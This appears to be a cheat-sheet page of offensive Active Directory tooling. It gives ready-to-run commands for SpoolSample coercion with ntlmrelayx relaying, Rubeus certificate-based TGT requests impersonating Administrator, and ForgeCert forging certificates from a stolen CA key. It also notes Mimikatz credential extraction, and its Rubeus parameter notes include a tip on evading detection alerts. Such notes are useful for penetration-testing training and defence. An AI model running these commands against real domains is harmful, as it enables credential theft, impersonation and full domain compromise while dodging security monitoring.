Skip to main content

Active Directory Tools

PSPKIAudit

PowerShell Toolkit for auditing Active Directory Certificate Services (AD CS).

# Import
Import-Module .\PSPKIAudit.psm1

# Usage
Invoke-PKIAudit
Get-CertRequest

SpoolSample

Tool to coerce Windows hosts Authenticate to other Machines via the MS-RPRN RPC Interface.

:: Should be Executed on the Target Machine
SpoolSample <Target> <Receiver>

:: Authentication Requests can be caught using [NTLMRelayx]
:: Commands can be specified with [-c]
ntlmrelayx -smb2support -t smb://<Target> -debug

Rubeus

Tool for raw Kerberos Interaction and Abuses.

:: [user]        - Specifies the User that we will Impersonate and has to match the UPN for the Certificate we Generated
:: [enctype]     - This specifies the Encryption type for the Ticket. Setting this is Important for Evasion, since the Default Encryption algorithm is weak, which would result in an Overpass-The-Hash Alert
:: [certificate] - Path to the Certificate we Generated
:: [password]    - The Password for our Certificate File
:: [outfile]     - The File where our TGT will be Output
:: [domain]      - The FQDN of the Domain we are Currently Attacking
:: [dc]          - The IP of the Domain Controller which we are Requesting the TGT from. Usually it is best to select a DC that has a CA Service Running
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<CertificateLocation> /password:<Password> /outfile:<OutputFile> /domain:za.adobe.loc /dc:<Target>

ForgeCert

Uses a stolen Certificate Authority (CA) Certificate + Private Key to forge Certificates for arbitrary Users capable of Authentication to Active Directory.

:: [CaCertPath]      - Path to our Exported CA Certificate.
:: [CaCertPassword]  - Password used to Encrypt the Certificate. By default, Mimikatz assigns the Password of mimikatz.
:: [Subject]         - The Subject or Common Name of the Certificate. 
:: [SubjectAltName]  - This is the User Principal Name (UPN) of the Account we want to Impersonate with this Certificate. (It has to be a Legitimate user)
:: [NewCertPath]     - Path to where ForgeCert will Store the generated Certificate.
:: [NewCertPassword] - The Certificate will require the Private Key exported for Authentication purposes, we must set a new Password used to Encrypt it.
ForgeCert.exe --CaCertPath <CA Path> --CaCertPassword <Password> --Subject CN=User --SubjectAltName <UPN> --NewCertPath <Export Path> --NewCertPassword <Password>

Other

  • Mimikatz: Used to extract Plain-Text Passwords - Hash, PIN Code and Kerberos Tickets from Memory. Can also perform Pass-The-Hash, Pass-The-Ticket or build Golden Tickets.
  • Kakeo: Toolbox to Manipulate Microsoft Kerberos.